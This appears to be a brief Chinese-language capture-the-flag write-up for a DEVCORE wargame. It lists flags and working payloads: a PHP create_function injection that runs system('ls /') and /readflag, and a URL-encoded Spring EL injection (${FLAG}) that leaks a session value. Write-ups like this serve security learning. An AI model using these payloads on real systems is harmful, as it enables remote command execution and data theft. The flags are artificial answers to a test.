Welcome
使用線上工具解密
flag: DEVCORE{h0pe_y0u_enj0y_0ur_wargame}
Supercalifragilisticexpialidocious
明顯 create_function('', $code);
有洞。
使用 exploitDB 的 payload
payload: return -1 * var_dump($a[""]);}phpinfo();/*"]
成功看到 phpinfo()
。
payload: return -1 * var_dump($a[""]);}system('ls /');/*"]
發現 /readflag
。
payload: return -1 * var_dump($a[""]);}system('/readflag');/*"]
執行成功取得 flag。
flag: DEVCORE{o1d_th1ng_1s_g00d}
Expressionism
在 IndexController.java
看到 FLAG
被放在 session。
session.setAttribute("FLAG", System.getenv("FLAG"));
index.jsp
中有可以 injection 的地方。
<p><spring:message code="life.quotes.${id}" /></p>
在 Hack tricks 找到可用 ${}
injection。
payload: /?id=${FLAG}
送出後發現有違法字元。
payload: /?id=%24%7BFLAG%7D
把 payload 做 url encoding 後再試一次,成功取得 flag。
flag: DEVCORE{d1d_y0u_kn0w_th1s_b3f0r3}